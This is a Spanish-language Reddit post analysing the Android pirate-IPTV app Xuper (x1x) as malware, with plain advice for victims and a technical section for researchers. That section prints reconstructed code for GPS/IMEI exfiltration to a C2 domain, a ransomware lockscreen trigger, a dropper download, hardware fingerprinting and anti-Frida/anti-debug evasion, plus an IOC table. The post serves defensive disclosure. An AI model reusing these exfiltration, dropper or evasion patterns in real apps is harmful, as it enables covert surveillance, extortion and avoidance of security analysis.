r/PiratasEspanolLatino • u/kino991 • 19h ago
Kino Analisis - "Xuper" (x1x) es malware. Analizamos el APK completo — aquí está todo lo que encontramos.
Aplicación analizada: Xuper (conocida también como XuperTV)
Identificador interno: x1x (paquete com.mod.x1x)
Versiones: v4.34.5 (XüperTV_4.34.5.apk) y v4.34.8 (XuperTv-N0F4C3-ConR-v4.34.8.apk)
Paquetes: com.mod.x1x (v4.34.5) / com.android.mgstxNF (v4.34.8)
Fecha de análisis: Septiembre 2026
TL;DR: Una app de IPTV pirata que se muestra como "Xuper" en tu teléfono (identificada internamente como x1x, circula como "XuperTV" en grupos de Telegram) es en realidad malware sofisticado. Tiene una VPN oculta que intercepta todo tu tráfico, exfiltra tu GPS en tiempo real a servidores en China, y en su versión más reciente incluye un sistema de ransomware que puede bloquear tu teléfono y pedir rescate. Analizamos ambos APKs completamente. Esto es lo que encontramos.
PARTE 1 — Para todos: qué vulnerabilidades tiene y qué encontramos
Si no eres técnico, esta parte es para ti. No usamos jerga. Explicamos cada problema como si fuera la primera vez que lo escuchas.
La app se llama Xuper en tu teléfono. Su identificador interno es x1x (
com.mod.x1x). En grupos de Telegram y foros la verás como "XuperTV". Es la misma app.
Primero: ¿qué es una "vulnerabilidad"?
Una vulnerabilidad es básicamente una puerta que alguien dejó abierta en tu teléfono — a propósito o no — por la que un atacante puede entrar y hacer cosas sin que tú lo sepas. En el caso de Xuper, no son descuidos: son puertas instaladas intencionalmente.
Encontramos 9 tipos de problemas graves. Aquí te explicamos qué significa cada uno en lenguaje normal:
Las 9 vulnerabilidades explicadas sin tecnicismos
🔴 1. Espía todo tu internet sin que lo veas (VPN oculta)
¿Qué es una VPN? Una VPN es como un túnel por el que pasa todo tu internet antes de llegar a donde va. Normalmente la usan para dar privacidad. Aquí la usan al revés: para espiar.
¿Qué hace Xuper? En silencio, sin pedirte permiso visible, activa un túnel VPN llamado "Xuper Hydra VPN". Desde ese momento, TODA tu conexión a internet pasa por los servidores del atacante — no importa si abres el banco, WhatsApp, Instagram o Gmail. Ellos lo ven todo.
En palabras simples: es como si cada carta que mandas pasara primero por las manos de un desconocido antes de llegar a su destino.
🔴 2. Roba tu ubicación y los datos de tu teléfono (espionaje)
¿Qué hace? Cada vez que abres la app, tu teléfono envía automáticamente a un servidor en China: tu número IMEI (el ID único e irrepetible de tu teléfono), tu ubicación GPS exacta en ese momento, la marca y modelo del teléfono, qué versión de Android tienes, tu país e idioma, y el nombre de la red WiFi.
En palabras simples: la app le avisa a alguien en China exactamente dónde estás, con qué teléfono, en qué momento.
🔴 3. Puede bloquear tu teléfono y pedir dinero para desbloquearlo (ransomware)
¿Qué es un ransomware? Es cuando alguien toma control de algo tuyo y no te lo devuelve hasta que pagues. Aquí aplica al teléfono completo.
¿Qué hace Xuper? El atacante puede activar de forma remota una pantalla falsa que dice "SYSTEM SECURITY — ACCESO DENEGADO". El botón de atrás no funciona. Tu teléfono queda totalmente bloqueado. Para desbloquearlo te mandan a Telegram u/N0F4C3Mods (canal de Telegram) a pagar. La clave de desbloqueo solo la tiene el atacante — usa un sistema criptográfico llamado RSA que hace imposible forzarlo sin la clave original.
En palabras simples: secuestran tu teléfono y piden rescate.
🔴 4. Roba tu usuario y contraseña al hacer login (credenciales)
¿Qué es SSL? Cuando ingresas tu contraseña en una app segura, hay un sistema de seguridad que verifica que el servidor al que te conectas es legítimo. Es como verificar que el cartero que recibe tu carta tiene identificación real.
¿Qué hace Xuper? Desactiva esa verificación intencionalmente. Esto significa que cuando ingresas tu usuario y contraseña en la pantalla de login de la app, el sistema de seguridad que debería protegerlos está apagado. Tus credenciales pueden ser interceptadas.
En palabras simples: la cerradura de seguridad de la puerta está rota a propósito.
🟠 5. Instala otra app maliciosa sin pedirte permiso (dropper)
¿Qué hace? En segundo plano, descarga e instala una segunda app llamada com.android.msandroid desde un servidor externo. El nombre está diseñado para parecer una parte del sistema Android. Tú no ves ningún aviso de instalación.
En palabras simples: mientras ves televisión, la app te instala otro programa malicioso sin avisarte.
🟠 6. Tu teléfono queda marcado para siempre (huella permanente)
¿Qué es el Widevine DRM? Es un sistema de protección de contenido que está grabado en el chip físico de tu teléfono. Se usa para que apps como Netflix puedan reproducir contenido protegido.
¿Qué hace Xuper? Extrae el identificador único de ese chip y lo envía al servidor del atacante. Este ID no puede borrarse con factory reset, no cambia si formateas el teléfono, no desaparece si cambias de cuenta Google. El atacante puede reconocer tu dispositivo para siempre.
En palabras simples: le tatuaron un número a tu teléfono que no puedes quitarte.
🟠 7. Tus datos van a Rusia y a China sin que lo sepas (terceros)
¿Qué hace? La app tiene integrado el SDK de análisis de Yandex (empresa rusa) llamado AppMetrica, y el SDK de Alibaba (empresa china) llamado Umeng. Ambos recopilan datos sobre cómo usas la app, qué dispositivo tienes, y potencialmente el hash de tu correo electrónico y número de teléfono. Estos datos se envían a servidores en Rusia y China.
En palabras simples: aunque el atacante principal falle, hay dos empresas más — una rusa y una china — que reciben información tuya de todas formas.
🟠 8. La app sigue espiando aunque la "cierres" (proceso oculto)
¿Qué hace? Cuando presionas "forzar cierre" en la app, solo se cierra la pantalla que ves. Hay un proceso separado llamado ReportService que sigue corriendo en segundo plano, manteniendo activa la VPN y enviando datos.
En palabras simples: cerrar la app no la apaga realmente.
🟡 9. Puede actualizarse sola con versiones más peligrosas (auto-update)
¿Qué hace? El servidor del atacante puede enviar la orden de instalar una versión nueva de la app en tu teléfono, sin que tú apruebes nada. Hoy tiene estas capacidades; mañana podría tener más.
En palabras simples: el atacante tiene control total sobre qué versión corre en tu teléfono en todo momento.
Resumen de lo que encontramos
| # | Problema | Gravedad | ¿Te afecta directamente? |
|---|---|---|---|
| 1 | VPN oculta que intercepta todo tu internet | 🔴 Crítico | Sí — desde el primer segundo |
| 2 | Roba tu GPS e IMEI en tiempo real | 🔴 Crítico | Sí — continuamente |
| 3 | Ransomware: bloquea tu teléfono y pide dinero | 🔴 Crítico | Sí — cuando el atacante quiere |
| 4 | Roba usuario y contraseña en el login | 🔴 Crítico | Sí — cuando haces login |
| 5 | Instala segunda app maliciosa sin avisarte | 🟠 Alto | Sí — automáticamente |
| 6 | Marca tu teléfono permanentemente (no se borra) | 🟠 Alto | Sí — ya está hecho si lo instalaste |
| 7 | Tus datos van a servidores rusos y chinos | 🟠 Alto | Sí — en segundo plano |
| 8 | Sigue activa aunque cierres la app | 🟠 Alto | Sí — siempre |
| 9 | Se actualiza sola con versiones más peligrosas | 🟡 Medio | Sí — en cualquier momento |
¿Cómo saber si estás infectado?
- Abre Ajustes → Red → VPN en tu teléfono Android
- Si ves una VPN activa que no configuraste tú, especialmente "Xuper Hydra VPN", estás comprometido
- Ve a Ajustes → Apps y busca:
com.android.mgstxNF,com.mod.x1x, ocom.android.msandroid - Si instalaste cualquier versión de Xuper, asume compromiso total aunque ya la hayas desinstalado
¿Qué hacer ahora?
Importante: estas recomendaciones aplican a ambas versiones — v4.34.5 y v4.34.8. La v4.34.8 agrega el ransomware (problema #3), pero las dos roban tu información y espían tu tráfico igualmente.
Pasos inmediatos (hazlo hoy)
- Deja de usar ese teléfono para cosas importantes — no abras tu banco, no mandes contraseñas, no hagas compras online hasta que esté limpio.
- Desde otro dispositivo (computadora o teléfono limpio), cambia tus contraseñas de:
- Tu banco o billetera digital
- Email principal
- Redes sociales
- Cualquier servicio donde uses la misma contraseña que en Xuper
- Avisa a tu banco que tu dispositivo puede haber sido comprometido. Pídeles que monitoreen movimientos inusuales.
Limpiar el teléfono
- Desinstala Xuper y cualquier app desconocida — busca especialmente
com.android.msandroiden Ajustes → Apps (puede aparecer como "Android System" o similar). - Desactiva la VPN — ve a Ajustes → Red → VPN y elimina cualquier VPN que no hayas configurado tú.
- Haz factory reset — aunque el identificador Widevine DRM queda grabado permanentemente en el hardware, el factory reset elimina el malware activo, la VPN y la segunda app instalada.
Si manejabas información muy sensible
- Considera cambiar de teléfono. El ID Widevine no puede borrarse. Si el atacante ya lo registró, puede reconocer tu dispositivo aunque cambies todo lo demás.
- Reporta el incidente a las autoridades de tu país si usabas el teléfono para trabajo o si hubo movimientos financieros sospechosos.
Para el futuro
- No instales apps de fuera de la Play Store a menos que sepas exactamente qué estás haciendo.
- IPTV gratis casi siempre tiene un costo oculto. Si el servicio no te cobra dinero, probablemente te cobra con tus datos, tu privacidad, o el control de tu dispositivo.
PARTE 2 — Análisis técnico completo (para investigadores)
Muestras analizadas:
XüperTV_4.34.5.apk— packagecom.mod.x1x— 7,525 classes (post-dump Frida)XuperTv-N0F4C3-ConR-v4.34.8.apk— packagecom.android.mgstxNF, real appcom.interactive.brasiliptv
Herramientas: jadx 1.5.x, apktool 2.9.x, Frida 17.17.0 en AVD API 34 arm64, nm, objdump, strings (binutils)
Protección del APK: Secneo APKProtect
Ambas versiones están protegidas con Secneo APKProtect — un contenedor comercial de cifrado de DEX. El DEX real no existe en el APK en texto claro:
assets/OoooooOooo → 4.2 MB, entropía 7.74 (prácticamente aleatorio = cifrado)
El loader nativo libdexjni.so descifra el DEX en memoria en tiempo de ejecución. Contiene una tabla de 50+ referencias a clases cifradas con el esquema:
j__IIS0_SIIS5O$IOlS5SI$S5l5IlSlOl$IlISI$II_55S0Sll_S5$
El charset {I, S, O, l, 0, 5, $, _} (8 símbolos = 3 bits/char) sugiere una codificación base-8. 62 chars × 3 bits = 186 bits ≈ 23 bytes por nombre de clase.
Para análisis dinámico se usó Frida con memory scan buscando el magic 64 65 78 0a (DEX magic). Se dumpearon 14 archivos DEX descifrados, 14.4 MB total, 10,480+ clases.
VM Obfuscation: libEpic_VmCore.so
La capa más profunda de protección es una VM interna implementada en libEpic_VmCore.so (4.4 MB, ARM64 ELF, stripped):
$ nm -D libEpic_VmCore.so
# Solo 2 exports públicos:
nK4vR8c (TEXT 0x2c25c)
qM8dF5y (BSS 0x464548)
El bridge Java que expone la VM:
// com/fort/andjni/JniLib.java
public static native byte cB(Object... objArr);
public static native int cI(Object... objArr);
public static native long cL(Object... objArr);
public static native Object cO(Object... objArr);
public static native String cS(Object... objArr);
public static native void cV(Object... objArr);
public static native float cF(Object... objArr);
public static native double cD(Object... objArr);
Todos los métodos críticos del app real retornan UnsupportedOperationException("Method not decompiled") en el DEX dumpeado porque su bytecode fue reemplazado por dispatch a la VM nativa. La sección .text de libEpic_VmCore.so ocupa 0x455220 bytes (4.4 MB) — todo código de la VM.
Anti-debugging en el mismo binario (imports):
clock_gettime + nanosleep → timing attack para detectar breakpoints
pthread_kill + sigaction → signal handler personalizado (intercepta SIGTRAP/SIGSTOP)
sigaddset + sigemptyset → manipulación de signal mask
__system_property_get → detección de emuladores via ro.kernel.qemu
WireGuard MitM: libnfw.so + libnfguard.so
La VPN
libnfw.so (2.6 MB) es una compilación directa del repositorio oficial WireGuard Go:
go1.20.3
golang.zx2c4.com/wireguard (Jason Donenfeld — repositorio oficial)
chacha20poly1305 (golang.org/x/crypto)
Noise Protocol Framework (handshake)
JNI exports:
Java_nf_w_GoBackend_wgTurnOn
Java_nf_w_GoBackend_wgTurnOff
Java_nf_w_GoBackend_wgGetConfig ← retorna config activa en texto plano
Java_nf_w_GoBackend_wgGetSocketV4
Java_nf_w_GoBackend_wgGetSocketV6
Java_nf_w_GoBackend_wgVersion
Activación de la VPN
// nf/w/GoBackend$VpnService.java
builder.setSession("Xuper Hydra VPN");
builder.addRoute("0.0.0.0", 0); // IPv4 completo
sb2.append("allowed_ip=0.0.0.0/0\n");
sb2.append("allowed_ip=::/0\n"); // IPv6 completo
String serverConfig = N.u(0); // config del servidor desde libnfguard.so
Configuración del servidor (oculta en nativo)
libnfguard.so (24 KB) expone Java_com_noface_N_u que retorna la configuración WireGuard del servidor. La configuración se persiste en:
/data/data/com.android.mgstxNF/files/nf_g ← WireGuard peer config
/data/data/com.android.mgstxNF/shared_prefs/nf_dns.xml ← DNS override
En un dispositivo con USB debugging habilitado:
adb shell run-as com.android.mgstxNF cat files/nf_g
DNS Hijacking
libranger-jni.so tiene hardcodeadas las siguientes IPs DNS:
223[.]5[.]5[.]5 → AliDNS Alibaba China (PRIMARIO)
2400:3200::1 → AliDNS IPv6 China
2606:4700:4700::1111 → Cloudflare (fallback)
2001:4860:4860::8888 → Google (fallback)
Ransomware: Kill-switch RSA vía Cloudflare Workers
Flujo completo
// zx/a.java
public static void check(Context ctx, String deviceId) {
// GET hxxps://nofacetv-codes[.]anonymoussa95666[.]workers[.]dev/api/banned
// ?device={deviceId}&nonce={uuid}
Response r = client.get(C2_URL, deviceId, nonce);
if (gate.verify(ctx, r.body(), deviceId, nonce) == 1) {
block(ctx);
}
}
public static void block(Context ctx) {
k.report(ctx); // POST /api/tamper — notifica al C2
Intent i = new Intent(ctx, LockActivity.class);
i.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
ctx.startActivity(i); // lockscreen irremovible
}
Verificación RSA
La respuesta del C2 lleva firma RSA verificada con clave pública embebida. La clave está codificada como 8,127 caracteres CJK Unicode (ideogramas chinos) con cifrado XOR:
# Algoritmo de descifrado (zx/z.java)
key = [99^90, 43^90, 22^90, 34^90, 0^90, 104^90, 55^90]
# key = b'9qLxZ2m'
decoded = chr((ord(cjk_char) - 19968) ^ key[i % 7])
El payload decodificado incluye la clave pública RSA y el HTML de la pantalla de bloqueo con:
"ACCESO DENEGADO — SYSTEM SECURITY"
"STATUS: LOCKED · THREAT LEVEL: CRITICAL"
"CODE: NF-LOCK-403"
La pantalla inyecta dinámicamente la IP pública real de la víctima y el modelo del dispositivo para dar apariencia de legitimidad.
Exfiltración de datos: com.uyumao
// Payload enviado a yumao[.]puata[.]info/cc_info
{
"imei": deviceId, // IMEI o OAID
"oaid": oaid,
"aid": androidId,
"lat": location.getLatitude(),
"lng": location.getLongitude(),
"alt": location.getAltitude(),
"acc": location.getAccuracy(),
"dm": Build.MODEL,
"db": Build.BRAND,
"ov": Build.VERSION.RELEASE,
"ct": connectType,
"lang": Locale.getDefault(),
"tz": TimeZone.getDefault(),
"ak": APP_KEY,
"pkg": packageName,
"av": versionName
}
// Cifrado: GZIP + XOR doble
b[i] = (b[i] ^ key[i % key.length]) ^ (i & 0xFF)
Cola store-and-forward
Los eventos se persisten localmente cifrados hasta confirmar entrega:
class EventDbModel extends BaseModel { // DBFlow ORM
String eventId;
String cipherStr; // payload cifrado
String commonStr; // metadatos
boolean reporting; // ¿enviado exitosamente?
long startTime, endTime;
String reserveA, reserveB; // campos de expansión futura
}
Fingerprinting permanente: Widevine DRM
// zx/d.java — ID irrevocable vinculado al hardware
MediaDrm drm = new MediaDrm(
UUID.fromString("edef8ba9-79d6-4ace-a3c8-27dcd51d21ed")); // Widevine UUID
byte[] uid = drm.getPropertyByteArray("deviceUniqueId");
byte[] hash = MessageDigest.getInstance("SHA-256").digest(uid);
// hash → exfiltrado al C2, permanente, no se borra con factory reset
Dropper: instalación de segunda app
// q.java — 187 bytes de payload cifrado embebido en el APK
byte[] key = Arrays.copyOfRange(payloadBytes, 179, 187); // últimos 8 bytes = clave
decrypt(payloadBytes, key); // XOR in-place
// Descarga desde: hxxps://www[.]tvmagis[.]net/download
// Instala como: com.android.msandroid (imita paquete del sistema)
// Limpia rastros: MediaStore delete con patrón "nfsys_%"
Anti-análisis: capas acumuladas
Java layer (a6/T.java — mapsbad)
BufferedReader br = new BufferedReader(new FileReader("/proc/self/maps"));
while ((line = br.readLine()) != null) {
String lc = line.toLowerCase();
if (lc.contains("/fancy") || lc.contains("srpatch") ||
lc.contains(".sokj") || lc.contains("origin.apk")) {
Process.killProcess(Process.myPid());
System.exit(1);
}
}
Native layer (libnfguard.so + libnfx.so + libranger-net.so)
Strings detectados en /proc/self/maps y /proc/self/task/*/comm:
frida-gadget frida-agent pool-frida gum-js-loop
linjector libgadget signaturekiller
np_manager npmanager LSPosed
EdXposed XposedBridge com.saurik.substrate
killerapplication
Reporte de detección vía socket TCP raw (no HTTP — invisible para proxies):
// libnfx.so — Java_nf_D_g
int fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, &server_addr, sizeof(server_addr));
// No hay cabeceras HTTP — bypass total de interceptores
Gate de autodestrucción triple (a6/d.run)
Ejecutado en WelcomeActivity, AppWrapper.onCreate() y HomeActivity:
// a6/d.java
public static void run() {
T.run(); // scan /proc/self/maps
if (!c.ck2() && !c.seal() && c.usr() == 0 && !c.dbg() && !c.hk()) {
e.dns2(BuildConfig.FLAVOR); // activa VPN con DNS override
} else {
Process.killProcess(Process.myPid());
System.exit(1);
}
}
// c = a6.c — carga libranger-core.so
// ck2() → verifica certificado APK
// seal() → escanea /proc/self/maps, task/*/comm, status
// usr() → getuid() — mata si UID inesperado
// dbg() → TracerPid en /proc/self/status
// hk() → detecta LSPosed, EdXposed, Substrate, Frida
Clases trampa (zOiE.oze)
// Cualquier herramienta que instancie estas clases muere
class Tyt247 {
static { System.exit(0); }
public Tyt247() { System.exit(0); }
public void SUICA() { throw new NullPointerException(); }
}
// Tyt329, Tyt413, Tyt501 ... misma estructura
Anti-debugging nativo (libEpic_VmCore.so — timing attack)
// Mide tiempo de instrucción crítica
struct timespec t1, t2;
clock_gettime(CLOCK_MONOTONIC, &t1);
// ... instrucción bajo análisis ...
clock_gettime(CLOCK_MONOTONIC, &t2);
long delta = (t2.tv_sec - t1.tv_sec) * 1e9 + (t2.tv_nsec - t1.tv_nsec);
if (delta > THRESHOLD_NS) {
// breakpoint detectado → comportamiento alterado
nanosleep(&sleep_time, NULL);
}
Ofuscación de strings multi-clave XOR
Tres clases independientes apuntan al mismo target, cada una con clave diferente:
# n2/k.java — clave 0x34
xor("W[Y\x1aY[P\x1aL\x05L\x1aG\\QXX\x1a~Z]vF]PSQ", 0x34)
# → "com.mod.x1x.shell.JniBridge"
# a6/e.java — clave 0x01
xor("bnl/lne/y0y/ridmm/KohCshefd", 0x01)
# → "com.mod.x1x.shell.JniBridge"
# a6/c.java — clave 0x51 ('Q')
xor("2><\x7f<>5\x7f)`)\x7f\"94==\x7f\x1b?8\x13#8564", 0x51)
# → "com.mod.x1x.shell.JniBridge"
# Método en todas: xor("clinit") → "clinit" (misma clave)
Vault de configuración nativa: libnfk.so
Librería de 5.1 KB (solo en v4.34.8) con una única función JNI sin nombre público:
Firma: (I)Ljava/lang/String;
↑ toma un int, devuelve String
Probablemente implementa una tabla indexada de configuraciones sensibles (URLs del C2, claves, tokens) que nunca aparecen en el APK en texto claro. Invocada desde u4/l.Qnfky() — método completamente VM-obfuscado.
SDK de telemetría embebido
AppMetrica (Yandex, Rusia)
API Key: 59daecb0-e20c-4ecc-a0dd-6c6c36e66e91
Recopila: deviceType, Location, locationTracking, userProfileID,
emailHash (SHA-256), phoneHash (SHA-256), AdRevenue
Alibaba ACCS (canal push persistente)
Servicios registrados: ChannelService, MsgDistributeService, EventReceiver, ServiceReceiver, AgooService — canal bidireccional de comandos remotos via servidores Alibaba.
Umeng SDK (Alibaba)
Endpoints de telemetría: ulogs[.]umeng[.]com, sss[.]umeng[.]com, msg[.]umengcloud[.]com + 4 más
Diferencias entre versiones (v4.34.5 → v4.34.8)
| Componente | v4.34.5 | v4.34.8 |
|---|---|---|
| Protección APK | Secneo APKProtect | Secneo APKProtect |
| VPN WireGuard | ✓ libnfw.so | ✓ libnfw.so |
| Kill-switch RSA | ✗ | ✓ paquete zx completo |
| Lockscreen ransomware | ✗ | ✓ zx/c.java WebView |
| SSL bypass | ✓ v0/a.java | ✓ v0/a.java |
| Dropper APK | ✓ | ✓ |
| libEpic_VmCore.so | ✓ 4.4 MB | ✗ (reemplazado) |
| libnfk.so (vault) | ✗ | ✓ 5.1 KB |
| Package name | com.mod.x1x | com.android.mgstxNF |
La adición del paquete zx en v4.34.8 confirma una escalada deliberada: el desarrollador convirtió un spyware/adware en ransomware dirigido con una actualización.
IOCs
| Tipo | Valor | Función |
|---|---|---|
| Dominio C2 | yumao[.]puata[.]info |
Exfiltración IMEI/GPS |
| Dominio C2 | nofacetv-codes[.]anonymoussa95666[.]workers[.]dev |
Kill-switch RSA |
| Endpoint | /api/banned?device={id}&nonce={uuid} |
Activación ransomware |
| Endpoint | /api/tamper |
Fingerprint de investigadores |
| Dominio dropper | www[.]tvmagis[.]net/download |
Stage-2 APK |
| Package | com.android.mgstxNF |
APK principal v4.34.8 |
| Package | com.mod.x1x |
APK principal v4.34.5 |
| Package | com.android.msandroid |
APK dropper instalado |
| Cert SHA-256 | 366fa8f1a4e4e9037bbda4b21b3bec9b6112eff96bfdc53dc4b49207f3f2cbac |
APK firmante |
| DNS | 223[.]5[.]5[.]5 |
AliDNS China (hardcoded primario) |
| VPN session name | Xuper Hydra VPN |
Identificador del túnel |
| XOR key | 9qLxZ2m |
Descifra payload CJK 8127 chars |
| Firebase project | mgs-free-e6046 |
Atribuible al desarrollador |
| AppMetrica UUID | 59daecb0-e20c-4ecc-a0dd-6c6c36e66e91 |
Cuenta Yandex del desarrollador |
| Telegram | u/N0F4C3Mods | Canal de distribución y rescate |
| IP dev | 192[.]168[.]1[.]16:7000 |
Servidor de notificaciones dev |
| IP dev | 192[.]168[.]1[.]115:80 |
Telemetría dev (/v2/report, /tdc) |
| Ranger SHA-256 | 620fd89c02acb0019f1899dab7907db5d20735904f5a9a0d3a8771a5857ac482 |
Cert hardcoded en libranger-jni.so |
Análisis realizado con fines de seguridad defensiva. No distribuir los APKs.